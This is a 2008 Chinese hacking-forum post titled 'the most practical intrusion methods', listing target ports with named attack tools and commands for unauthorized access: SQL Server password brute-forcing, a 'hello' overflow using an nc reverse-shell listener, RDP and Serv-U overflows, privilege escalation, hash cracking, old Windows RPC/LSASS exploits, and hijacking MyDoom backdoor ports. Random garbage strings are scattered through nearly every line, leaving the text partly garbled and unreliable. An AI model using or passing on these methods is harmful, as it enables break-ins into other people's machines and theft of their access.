我爱电脑技术论坛 » 网络安全区 » 目前最实用的入侵方法

黑侠 发表于 2008-5-14 08:46

目前最实用的入侵方法

1. 1433端口入侵!`4fsQvL t|
scanport.exe 查有1433的机器
P!wN&n)rDw SQLScanPas*.**e 进行字典暴破（字典是关键）
)F$Igg$i/A{-N!D 最后 SQLTool*.**e入侵YJHJV'ZKw#{
=============================2};I9}v:gn
对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。1rHC\4dl7[
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口L ]DJ(G"D9w'nU#p:y
（以上反向的，测试成功）
Q`+b u?+KXw+AO sqlhelloz.exe 入侵ip 1433 （这个是正向连接） MD H:F8]$l6z

0]IaF*M8ln;E 2. 4899端口入侵#D-DK:}4E D9Pa
用4899过滤器.exe，扫描空口令的机器
dn$z1?
|bb:k aB`7MAqS
3. 3899的入侵

@ A{9JyX'M-^i G:`)Ci-I 对很早的机器，可以试试3389的溢出(win3389ex.exe)1X y&N\T_.j]
对2000的机器，可以试试字典暴破。(tscrack.exe)
g;Tt)^'WKp }w(WkGlkE'E.s
4. 80入侵
8C/@w By(?:T1e 对sp3以前的机器，可以用webdav入侵；3e4?a5m'^
~UF
对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）A:Gr5yX
可以利用SQL进行注入。（小榕的注入软件）。w"bR+nWd| g Y
6tqpaNDn
5. serv-u入侵(21端口）2n1i6C)u(I"@
对5. 004及以下系统，可用溢出入侵。（serv5004.exe）
:}WE#Q} 对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）
Y&oL8b;qo ======================================V OEz~I{[JlYw
对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）1F.Zv;q z8o.~8\
Li
输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
rk Wi)pf|;\ {
^M0iVO:Q8g 6. 554端口
bh"lcKYt 用real554.exe入侵。
&y Nv(g$lS*u
q%PZKk[ `J N 7. 6129端口wEW^
o2c
用DameWare6129.exe入侵。 C:Es B0Kf
R4]C#T%y!O r
8. 系统漏洞
GQ b9G1{RzI;o,l:o 利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，1x)r&HM\4u7X
进行溢出入侵。8y5|&rrkn

RfU'f[0Q BE8vx 9. 3127等端口
+DE;O pFmeh9i 可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。
&s$\&s%i
CM
@ ei5];e|9o s 10. 其他入侵
BnQ;i_L 利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。

查看完整版本: 目前最实用的入侵方法